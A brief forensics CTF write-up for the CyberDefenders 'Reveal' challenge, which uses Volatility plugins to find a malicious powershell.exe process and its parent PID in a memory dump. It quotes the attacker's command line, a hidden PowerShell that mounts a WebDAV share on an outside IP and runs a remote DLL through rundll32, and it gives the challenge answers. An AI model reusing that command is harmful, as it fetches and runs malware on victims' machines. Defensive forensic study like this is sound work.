Scenario

You are a forensic investigator at a financial institution, and your SIEM flagged unusual activity on a workstation with access to sensitive financial data. Suspecting a breach, you received a memory dump from the compromised machine. Your task is to analyze the memory for signs of compromise, trace the anomaly's origin, and assess its scope to contain the incident effectively.

https://cyberdefenders.org/blueteam-ctf-challenges/reveal/

1- Identifying the name of the malicious process helps in understanding the nature of the attack. What is the name of the malicious process?

powershell.exe

first we determine if this memory dump was taken from windows or linux using windows.info plugin

after we determined its windows we use pstree plugin to display the process tree and find the malicious one

identified a suspicious process and confirmed after a review of the command line used to execute it

powershell.exe -windowstyle hidden net use \\\\45.9.74.32@8888\\davwwwroot\\ ; rundll32 \\\\45.9.74.32@8888\\davwwwroot\\3435.dll,entry

2- Knowing the parent process ID (PPID) of the malicious process aids in tracing the process hierarchy and understanding the attack flow. What is the parent PID of the malicious process?

4120

we can see the answer from the previous question pstree screenshot